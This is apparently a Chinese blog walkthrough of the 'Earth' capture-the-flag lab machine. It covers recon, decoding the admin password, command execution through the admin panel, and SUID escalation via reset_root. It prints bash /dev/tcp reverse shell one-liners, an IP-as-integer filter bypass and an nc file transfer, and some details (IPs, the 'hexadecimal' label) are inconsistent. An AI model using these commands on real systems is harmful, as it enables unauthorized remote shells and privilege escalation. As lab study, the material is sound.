Earth靶机实验实战演练

一、主机信息收集

主机存活探测:

be5275077e30460db5b806ebcbfc95c9.png

Kali ip :   192.168.119.130

Earth ip: 192.168.119.129

 

对其端口进行扫描:

f8c3a8003d5a4459abe1a58f23e9b793.png6c597903bb5c4aaf953f49549b93b115.png

5b729356243848f0919be394cd6031de.png

发现开放了22、80、443,并且这里的dns 进行了绑定

在kail上 去修改 hosts 文件,这样我们接下来就可以进行访问了。

进行域名的绑定操作

 

#vim /etc/hosts
修改hosts 文件的配置

 

c0841d55b99f43b4abc51feee782dccb.png

 

二、web信息收集

目录查看

51cfe41b463746cb8133cced41b025b9.png

 

65d48b9ebf9340ddbc874cefb54a9b7f.png

先访问一下,earth.local ,看来只是个主页

ea781d7dcb62449eb6567a69d0e296dd.png

 

在之前扫描80目录的时候,有个登录界面,我们去看看

 

41e6146a6a0541ddaecfdcd90b25ccf1.png

 

点击 Log In 后 ,来到登录界面,发现需要用户名和密码

91ebc77e77e54e0a9737686432a5951c.png

这里暂时无法入手,我们再看看还有没有其他东西可以突破的。

 

 

在之前扫描443目录的时候,有个robots.txt 文件 ,去看看有没有可以操作的。

11e7d17eef8b4d3194df314b85ce259b.png

可见这里有特殊的信息,在最后一行上,是个什么记录来着

 

 

直接去访问 /testingnotes.txt

aac698f7ad934de8ba8b284a72d73338.png

 

 

abe7f10852d44f82affe428a76890743.png

 

解读信息 可知 用户名为 :terra ,密码被加密了,testdata.txt在之前用于测试加密。

看一下这个testdata.txt 文件

01aa3e9c2e3443de85664433c4f37529.png

4cc093a7b9c144958ee13635ff08e434.png

作用:通过三个秘钥去尝试找到用户名为terra对应的密码

 

18df91bdcb434ebba678e58e50078a39.png

最后打印出来,发现重复最多的是earthclimatechangebad4humans,可以大致推断出密码就是这个了。

 

然后进行登录, 访问 earth.local/admin

4fbc4e28a7bc4a45bea7fd8f24540a31.png

 

用户名:terra

密码:earthclimatechangebad4humans

 

三、验证漏洞

发现ls ,whoami 系统命令都可以执行

925f904bc84142cca233de1de354337d.png

df05ea379896455893f41436029d4e9d.png

 

使用find命令查找flag:find / -name "*flag*",

可见可以通过find 命令找到flag

7a052ad5784740eeb9c47fbf1b9f7174.png

再使用cat /var/earth_web/user_flag.txt 的命令去获取flag.

7559daaa551841d3a1e29947e1092058.png 

四、使用反弹shell连接到靶机

 

通过编写个反弹shell:

bash -i >& /dev/tcp/192.168.119.129/4444 0>&1

6fc5604a95e74feeb2fd28d14d376b29.png

这里发现远程连接给禁止了。

我们可用通过ip绕过进行连接

 

b351cca7ceca4e16b580472472992848.png

对ip中的数字进行了过滤,尝试使用十六进制绕过:

注:这里的IP 为kali 端的 ip.

bash -i >& /dev/tcp/3232266114/4444 0>&1

开启一个4444监听端口

3314a5dcc9e3493ab8fa0ae5031c5f49.png

 

 

SUID提权

查看靶机中有权限的二进制文件

find / -perm -u=s -type f 2>/dev/null

 

找到了 reset_root

b4b07bff3e1d4d87abee5ea0d4adff7f.png

 

直接执行发现没有用

06395c9f1d614a8b934e4957bb33a6f5.png

 

先在kali/接收方启动:

nc -l 5555 > reset_root

然后在靶机上(earth)/发送方 启动

nc 172.168.119.130 5555 < /usr/bin/reset_root

 

使用之前需要将 reset_root 赋于执行权限

7ddbfb35d38d40a4a59e7769c0925c76.png

 

从结果可以看到 会有 三个 No such file or directory

access("/dev/shm/kHgTFI5G", F\_OK) = -1 ENOENT (No such file or directory)

access("/dev/shm/Zw7bV9U5", F\_OK) = -1 ENOENT (No such file or directory)

access("/tmp/kcM0Wewe", F\_OK) = -1 ENOENT (No such file or directory)

那么可能因为靶机上没有这个三个文件,从而运行失败,那我们去靶机上创建这个三个文件,文件中是什么内容呢?

 

创建,然后运行

949eada9f8fd4fbfb85318b72264192d.png

 

dfb1abdd436c4b64bececdaf18dbb610.png

 

 

恭喜完成!!!

 

 

 

 

 

 

 

 

 

 

 

 

 

 

  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值